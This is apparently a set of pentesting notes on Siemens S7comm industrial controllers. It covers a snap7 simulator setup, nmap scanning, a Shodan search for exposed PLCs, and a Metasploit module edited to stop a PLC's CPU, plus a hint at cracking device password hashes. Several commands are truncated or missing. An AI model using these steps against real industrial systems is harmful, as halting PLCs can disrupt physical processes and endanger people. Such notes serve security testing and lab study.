Pentesting ICS (S7comm)

What is S7comm?

Siemens S7 PLC simulator

If you wanna play around, you can install an S7 simulator written on python:

  1. Download snap7-full-x.x.x.zip
  2. Unzip with name snap7-full in ~/
  3. Execute the following commands
$ cd ~/snap7-full
$ sudo apt-get install python-pip
$ sudo -H pip install python-snap7
$ cd build/unix
$ make -f
$ cd ../bin/x86_64-linux/
$ sudo cp /usr/lib
$ sudo ldconfig
$ sudo python
>>> import snap7
>>> s7server = snap7.server.Server()
>>> s7server.create()
>>> s7server.start()
>>> s7server.get_status()
('SrvRunning', 'S7CpuStatusRun', 0)

Now the simulator is ready!


Nmap scan:

nmap --script s7-info.nse -p 102 <host/s>

Shodan dork: port:102

Scan and identify:

#Example usage --timeout 2 --hosts-list hosts.txt

Using nMap with the script s7-info.nse

nmap --script s7-info.nse -p 102


There should be also some metasploit modules:

$ searchsploit Siemens Simatic S7

Add exploit 19831.rb to metasploit:

Metasploit comes with a ton of exploits already included; however, this Siemens exploit needs to be added. As the exploit was written with the usage of Metasploit in mind, this is a simple task. To add the module, run the following commands on the Kali Linux VM:

To adjust for using a newer Metasploit framework, we need to change the same code in the 19831.rb file. In the file take a look on the line 39:'MODE', [false, 'Set true to put the CPU back into RUN mode.',false]),```

Change the preceding to this:

```ruby'MODE', [false, 'Mode 1 to Stop CPU. Set Mode to 2 to put the CPU back into RUN mode.',1]),```

Now copy module to msf user directory:

$ cd ~/.msf4/modules/
~/.msf4/modules $ mkdir -p auxiliary/hardware/scada
~/.msf4/modules $ cd auxiliary/hardware/scada
~/.msf4/modules/auxiliary/hardware/scada $ cp /usr/share/exploitdb/platforms/hardware/remote/19831.rb 19831.rb
~/.msf4/modules/auxiliary/hardware/scada $ service postgresql start
~/.msf4/modules/auxiliary/hardware/scada $ msfconsole

Now go with metasploit:

msf > reload_all
msf > search siemens
msf > use auxiliary/hardware/scada/19831
msf auxiliary(19831) > show options
msf auxiliary(19831) > set RHOSTS
msf auxiliary(19831) > exploit
[+] PLC is running, iso-tsap port is open.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

On newer Siemens devices, they added a password for certain actions! Use to extract hash and crack it online!

Manual exploitation

Intercept traffic then make packets reply and stuff!


Resources and bibliography:

Good to read: